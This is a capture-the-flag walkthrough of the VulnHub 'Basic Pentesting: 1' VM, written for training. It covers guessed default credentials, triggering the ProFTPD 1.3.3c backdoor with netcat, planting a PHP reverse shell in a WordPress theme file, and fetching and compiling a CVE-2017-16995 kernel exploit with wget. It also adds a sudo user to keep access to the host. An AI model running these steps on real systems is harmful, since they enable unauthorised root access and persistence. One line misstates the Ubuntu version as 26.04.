Basic Pentesting: 1 is the first of a two-series challenge that demonstrates the pitfalls of using weak passwords and default settings. The walkthrough will show multiple weaknesses and exploits to achieve both low-privilege and root-privileged shells. A local privilege escalation will be used with the low-privilege shells to gain root-level access. The objective of this CTF is to compromise the Challenge VM, gaining root-level privileges.

This walkthrough uses an assessment format I’ve been developing rather than showing just the compromise highlights. As a result, the walkthrough runs long, but hopefully does a good job of communicating the vulnerabilities and exploits present on the host. 

Table of Contents

The Challenge

VM Author: Josiah Pierce
VulnHub Link

The author of this VulnHub challenge describes it as:

“This is a small boot2root VM I created for my university’s cyber security group. It contains multiple remote vulnerabilities and multiple privilege escalation vectors. I did all of my testing for this VM on VirtualBox, so that’s the recommended platform. I have been informed that it also works with VMware, but I haven’t tested this personally.

This VM is specifically intended for newcomers to penetration testing. If you’re a beginner, you should hopefully find the difficulty of the VM to be just right.

Your goal is to remotely attack the VM and gain root privileges. Once you’ve finished, try to find other vectors you might have missed! If you enjoyed the VM or have questions, feel free to contact me at: [email protected]

If you finished the VM, please also consider posting a writeup! Writeups help you internalize what you worked on and help anyone else who might be struggling or wants to see someone else’s process. I look forward to reading them!”

Back to Top 

My Environment

VMware Fusion v11.02, with an up-to-date version of Kali Linux was used to complete this challenge. An Apache web server also was used to transfer files to the Challenge VM. As the Challenge VM was designed for VirtualBox, it imported into VMware Fusion without any issues.

Back to Top 

Executive Summary

A root-privilege shell can be achieved by:

  • Exploiting insecure user credentials
  • Exploiting the compromised ProFTPD application

The following vulnerabilities were used to gain root-level access:

  • A compromised version of ProFTPD is exploitable via a source-implemented backdoor
  • An Ubuntu local privilege escalation BPF vulnerability (CVE-2017-16995)

Low-privilege shell access can be achieved by:

  • Utilizing guest console access
  • Overwriting then invoking a WordPress PHP file with malicious PHP code

All Low-privilege shells can be elevated to root-privilege by:

  • Exploiting a local privilege escalation eBPF vulnerability (CVE-2017-16995)

In all scenarios, once a root-privilege shell is achieved, users with root access can be created for persistent access to the host.

Note: This walkthrough does not enumerate all the vulnerabilities with this host. There may be other vulnerabilities and techniques of obtaining a root-privilege shell that were not initially discovered or utilized.

Back to Top 

Reconnaissance / Information Gathering

 Back to Top

Exploring the Login Console

Since this challenge boots into a graphical login screen let’s take a quick look. At first glance we can see that the Challenge VM might be Ubuntu-based, running version 16.04 LTS (Xenial Xerus).
Ubuntu Version
Some of the highlights for this version of Ubuntu are:

  • Linux Kernel 4.4
  • OpenSSH 7.2p2
  • Python 3
  • Golang 1.6
  • Apt 1.2

The upper-left corner displays what looks like the hostname, vtcsec.
Hostname
The Ubuntu Display Manger, LightDM in Xenial, is responsible for the Unity Greeter or login screen. In this case, it appears to be configured with its default settings that shows the available user accounts and allows for guest logins.
User Login Window
Since we do not yet know the password for marlinspike, let’s see if we can login with a Guest Session.
Guest Login Window
Well that was easy, after clicking on “Guest Session”, then on “Log In”, we were able to start a temporary guest session.
Guest Desktop
Let’s open a terminal session by right-clicking on the background, then selecting the terminal option. The id command shows the UID, GID, and group membership, we can also confirm that the hostname is vtcsec.
Guest Terminal Console
Let’s take a crack at the marlinspike account. There are a lot of lists that show common user passwords, the following is a pretty good sample.

  1. Password that are same as username.
  2. Personal information as password (name, city, birthday, family member names)
  3. welcome
  4. qwert
  5. abc123
  6. password

Let’s select the marlinspike account, then try a password that matches the username. Bingo! Let’s open a terminal session by right-clicking on the background, then selecting the terminal option. Again, the id command shows the UID and GID for the user, and that the marlinspike account is a member of the admin and sudo groups. In Ubuntu, the root user is disabled by default, but if we run the sudo -i command we will have access to a simulated root environment.
MarlinSpike Terminal Console
At this point we have full root access to the Challenge VM with minimal effort and can start harvesting the information off of this host. This is a good reminder on avoiding simple passwords and understanding & changing default settings.

Back to Top 

Remotely Exploring the Challenge VM

Next, let’s use a remote approach in exploring and exploiting this Challenge VM. To determine the IP address of the Challenge VM can use either arp-scan or netdiscover.
ARP Scan
Command: arp-scan -I eth1 10.254.10.0/24

The arp-scan output shows that the IP address of the Challenge VM is 10.254.10.130.
Note: The 10.254.10.254 address is from the VMware DHCP server for this subnet.

NMap Light Scan

The lightweight scan shows that the Challenge VM has FTP, SSH, and HTTP services available.
Light NMap Scan
Command: nmap 10.254.10.130 –top-ports 10 –open

NMap Discovery Scan

Next, let’s try to get the service details using a more in-depth nmap scan.
Discovery NMap Scan
Command: nmap 10.254.10.130 -p- -sV -A

The discovery scan shows:

  • The FTP service is running ProFTPD v1.3.3c
  • The SSH service is running OpenSSH v7.2p2 (4ubuntu2.2 package) on an Ubuntu host
  • The web service is running Apache v2.4.18

NMap UDP Scan

To help get a complete picture of the Challenge VM, let’s run a lightweight UDP scan.
NMap UDP Scan
Command: nmap -sU -top-ports 30 10.254.10.130 –open

UDP Port Probing
After some initial testing, it looks like only the IPP port (631/UDP) is responsive.

Back to Top 

Exploring the Available Services

Let’s start by making a few requests to the known open services, using the application like an end-user would.

TCP 21 – FTP Service

As the earlier nmap discovery scan showed, the FTP service is running ProFTPD, version, 1.3.3c, the hostname appears to be vtcsec. Several root login attempts failed using common/insecure passwords.
FTP Service
Command: ftp -v 10.254.10.130

TCP 22 – SSH Service

The earlier nmap discover scan showed the SSH service is running OpenSSH v7.2p2 (4ubuntu2.2 package) on an Ubuntu host. The root login attempts using common/insecure passwords failed, but it shows that both public keys and passwords are accepted on this host.
FTP Service
Command: ssh [email protected]

If we compare the 4ubuntu2 OpenSSH package to the Ubuntu package list, it show that there is a match for Xenial, 16.04LTS.
SSH Package

TCP 80 – HTTP Service

Let’s start exploring the headers and default landing page from the web server.
Curl HTTP Service
Command: curl -i http://10.254.10.130 –no-styled-output

The main web page appears to be the default and is pretty basic. From our discovery scan, we expected this to be running Apache 2.4.18, on an Ubuntu host, nothing new here. Next, let’s try to enumerate any hidden directories.
Enumerate Hidden Directories with Gobuster
Command:
gobuster -e -u http://10.254.10.130/ -w /usr/share/wordlists/dirb/common.txt

The redirected http://10.254.10.130/secret link looks interesting. Let’s curl this directory to see what it will display.
Curl HTTP Service
Command: curl 10.254.10.130/secret/ | html2text

This directory appears to be a WordPress blog, definitely worth taking a more in-depth look here. Let’s use Firefox to take a more in-depth look at this page.

The page looks like a WordPress Site, but it is not resolving very well. Let’s click on the “Hello World!” post.
WordPress Site Page
After clicking on the “Hello World” blog post, we again are seeing issues with resolving. It looks like this page is being redirected from our IP address of 10.254.10.130 to a vtcsec hostname. From what we’ve discovered so far, vtcsec, is probably the hostname for this VM. Toggling on the Web Inspector shows a dnsNotFound net error.
Site Not Found Error Page
Let’s try adding a host entry for vtcsec so that it will resolve to the assigned DHCP address.
Modify /etc/hosts File
After refreshing this page, the WordPress site now looks fairly standard.
WordPress Site Page
On the bottom-right, there is a “Login” link, let’s try to launch the WordPress login page. The default username for WordPress is admin. Let’s try that username with several common passwords; admin, password, maybe we will get lucky.
WordPress Login Page
Success! We now have admin access to this WordPress site. At this point, we can pretty easily obtain a low-privileged shell via Metasploit or by modifying one of the existing WordPress PHP pages with shellcode. Note that the WordPress version is 4.9 running the Twenty Seventeen theme.
WordPress Admin Dashboard
So far this Challenge VM has been pretty straight-forward. With what we’ve discovered so far, we should have enough information to start putting together an exploit plan for this host. Alternatively, if we were unable to guess the admin credentials for WordPress, we can use wpscan to enumerate the users and perform a brute force password attack with the following:

wpscan –url http://10.254.10.130/secret –wp-content-dir 10.254.10.130/secret/ –enumerate u
wpscan –url http://10.254.10.130/secret/ –passwords rockyou.txt -U admin –wp-content-dir 10.254.10.130/secret/ –max-threads 50

Note: For the passwords file we will use rockyou.txt available on Kali Linux.

Back to Top 

Attack Surface

 Back to Top

Discovery Review

So far, here is what we’ve learned about this VM:

  • The Ubuntu host is probably running Xenial, 16.04LTS
  • The FTP service is running ProFTPD v1.3.3c
  • The SSH service is running OpenSSH v7.2p2 (4ubuntu2.2 package) on an Ubuntu host
  • The web service is running Apache v2.4.18
  • The web service has what appears to be a default main page
  • The WordPress site is installed in the /secret/ directory
  • The WordPress site appears to be redirecedt from the IP address to the vtcsec hostname
  • The WordPress version is 4.9 running the Twenty Seventeen theme.
  • The WordPress login page is here; http://vtcsec/secret/wp-admin/
  • The WordPress admin login and password are admin & admin



Vulnerabilities

ProFTPD v1.3.3c

Command: searchsploit proftpd 1.3.3c
Results of proftpd searchsploit
Looks like this version of ProFTPD has a remote code execution (RCE) vulnerability. The file 15662.txt contains the compromise report, and according to the report, the backdoor allows for unauthenticated remote root access, however, does not include any PoC code.

16921.rb is a Metasploit Ruby script. In reviewing the script, it looks like the backdoor is tied to the HELP command, then invoked with the string “ACIDBITCHEZ”, followed by the payload.

Here is the exploit that the ruby script calls. Note the two sock.put calls, the first invoking the backdoor, the second, sending the payload.
Ruby Script Sniplet
Let’s try this manually with netcat and see what happens. Ruby Script Sniplet
Command: nc -nv 10.254.10.130 21

Note that the HELP ACIDBITCHEZ string does not return a “502 Unknown command” error as would be expected or a “500 Invalid command” when a few returns are entered. Let’s try entering an OS Command; such as id. Bingo got a root shell!

OpenSSH v7.2p2

Command: searchsploit OpenSSH 7.2p2
Results of SSH searchsploit
Our options here appear limited to username enumeration, which includes Python PoC code, could be useful but not too interesting.

Apache v2.4.18

On initial investigation, nothing appeared promising in searchsploit or on the web. So far, there are other options that could lead to an easier exploit.

WordPress version v 4.9

There are some possibilities with WordPress 4.9 that require authentication, but since we already have the admin site credentials, we are good to go for a low-privilege shell at minimum.

Ubuntu 16.04 LTS

We are looking for a local privilege escalation exploit to elevate the shell we will obtain from WordPress. Command: searchsploit ubuntu 16.04
Results of Ubuntu searchsploit
Looks like we will have some options once we have our low-privileged shell.

Back to Top 

Exploitation

 Back to Top

Vulnerability Review

So far, here is what we’ve learned:

  • The ProFTPD service is exploitable via a source-implemented backdoor
  • The WordPress site is exploitable via page modification from learned admin credentials
  • Ubuntu 26.04 LTS is vulnerable to several local privilege escalation exploits

Since we’ve already shown that a root-privileged shell is achievable by exploiting the ProFTPD service, our focus will be on gaining shell via the vulnerable WordPress site.

WordPress version v 4.9

Since we have admin access to the WordPress site, we can easily modify & replace one of the existing PHP files with a PHP reverse shell. A good template for this is available in Kali Linux, /usr/share/webshells/php/php-reverse-shell.php or directly from PenTestMonkey, http://pentestmonkey.net/tools/web-shells/php-reverse-shell.

The staging for the PHP reverse shell is pretty simple, just modify the IP and port to the intended listener.
PHP Reverse Shell
Next, we’ll login to the WordPress site with the admin credentials. Click on the “Appearance” icon, then select the “Editor” tool. We’ll be replacing the PHP code in the 404 template in the Twenty Seventeen theme with our reverse-shell PHP code. Click the update file in the editor to save the new 404.php file.

We’ll use a netcat listener to catch our PHP reverse shell.
Command: nc -nvlp 443

To invoke the reverse shell PHP code, launch FireFox with this link. Note that the link includes the secret directory and the theme directory where the original 404.php file resided.
Invoke PHP Reverse Shell
Command: http://vtcsec/secret/wp-content/themes/twentyseventeen/404.php

After we invoke the PHP reverse shell the browse will appear to hang, and if everything worked properly, netcat should have received our reverse shell.
Successful Reverse Shell

Commands Description
nc -nlvp 443 Start a netcat listener
uname -a Displays operating system information
lsb_release -a Displays distribution specific information

As expected, we can see that the web server is being run under a low-privileged user, www-data. Note that the release is Ubuntu 16.04.3 LTS using a 4.10.0-28-generic Linux kernel. If we review our searchsploit results for ubuntu 16.04 that we did in the Vulnerabilities section, we see that the 45010.c exploit fits our OS and Linux kernel.
Searchsploit PE Exploit
Since we’ll need a place to write our escalation exploit code, we see that we have full access to the /tmp/ directory.
Location to Write Exploit
We also have access to a gcc compiler and have verified that we can indeed write files to this location.
GCC Compiler Check
Back to Top 

Privilege Escalation

All our previous exploits resulted directly into a root-level shell, while the WordPress reverse shell resulted in a low-privileged shell that will need escalation to acquire root. Our PHP shell has been very stable, not dropping unexpectedly. We’ve identified a potential local escalation exploit and have verified that our www-data user has access to a compiler, and a writeable directory.

In reviewing the 45010.c code we see that it has been successful with Ubuntu 16.04 and a 4.10.0.42-generic kernel, so it looks like we will have a good chance of success with this exploit. The exploit is based on a BPF vulnerability (CVE-2017-16995) which could allow an unprivileged user to escalate their privileges on a system.

Additional information on the vulnerability and exploit can be found here:
https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html

The exploit code is well documented and appears clean, not containing code other than what it is intended to do. The code does not appear to need any additional modification or require anything special for compiling.

So, let’s stage this and give it a whirl. To get this onto the Challenge VM, we’ll copy the exploit code to our Kali web server then use wget to retrieve the exploit into the /tmp directory as it is writeable for the www-data user.
Successful Privilege Escalation
The exploit compiled without issues and we’ve got root!

Commands Description
wget http://10.254.10.44/ctf/45010.c Transfer the exploit to target
gcc 45010.c -o 45010 Compile the exploit code
chmod +x 45010 Make the compiled exploit executable
./45010 Run the compiled exploit
id Verify the UID & GID are zero

We now have permissions to the root directory and have achieved a root-level shell.
Privilege Escalation Verification
Back to Top 

Post Exploitation

Now that a root-level shell can be obtained, we can perform post exploitation activities; such as, maintaining persistency, and harvesting the information from the host.

With the root shell we can add a new user with sudo permissions. The following commands work in Ubuntu, and do not require an interactive shell.

  • useradd -MN -G sudo ngray
  • echo “ngray:temp123”|chpasswd

Adding Root User
We can now SSH to the Challenge VM with our new user-id and sudo to a root-level shell.
SSH as New Root User
Now that we have reliable access to the host, we can drop an enumeration script on it to start reviewing what we now have access too. A good starting point for this is here, https://highon.coffee/blog/linux-local-enumeration-script/.

Back to Top 

Summary

This challenge shows why weak passwords and default settings should not be used. The GUI Login console displays the user-id of the last logged in user, and is combined with an insecure, easily guessable, password. Guest-level access is also allowed, providing a low-privilege shell with no password required.

A root-privilege shell was achievable in minutes by being able to guess the password of the last logged in user. This user had membership in the sudo group, allowing an attacker to easily gain root permissions. These credentials also allowed for remote SSH access.

The guest-level access, while restricted to the console, is vulnerable to local privilege escalation, allowing an attacker with console access to gain a root-privilege shell. Note that local privilege escalation of guest access is not shown in this walkthrough but was tested.

The hidden WordPress site uses the default admin username along with an insecure, easily guessable, password. This allows an attacker to guess the admin credentials, obtaining administrative access to the WordPress application. No brute force required in any of these cases.

A root-privilege shell can be achieved by:

  • Exploiting insecure user credentials
  • Exploiting the compromised ProFTPD application

The following vulnerabilities were used to gain root-level access:

  • A compromised version of ProFTPD is exploitable via a source-implemented backdoor
  • An Ubuntu local privilege escalation BPF vulnerability (CVE-2017-16995)

Low-privilege shell access can be achieved by:

  • Utilizing guest console access
  • Overwriting then invoking a WordPress PHP file with malicious PHP code

All Low-privilege shells can be elevated to root-privilege by:

  • Exploiting a local privilege escalation BPF vulnerability (CVE-2017-16995)

In all scenarios, once a root-privilege shell is achieved, users with root access can be created for persistent access to the host.

Note: This walkthrough does not enumerate all the vulnerabilities with this host. There may be other vulnerabilities and techniques of obtaining a root-privilege shell that were not initially discovered or utilized in this walkthrough.

Back to Top 

References

  1. https://wiki.ubuntu.com/LightDM
  2. https://www.passworddragon.com/avoid-common-passwords
  3. https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/worst-passwords-2017-top100-slashdata.txt
  4. https://www.wikihow.com/Become-Root-in-Ubuntu
  5. https://hackingnewideas.wordpress.com/2014/01/02/how-to-upload-shell-in-wordpress-sites/
  6. http://pentestmonkey.net/tools/web-shells/php-reverse-shell
  7. https://www.aldeid.com/wiki/Exploits/proftpd-1.3.3c-backdoor
  8. https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
  9. https://highon.coffee/blog/linux-local-enumeration-script/

Back to Top

12/12/18 16:52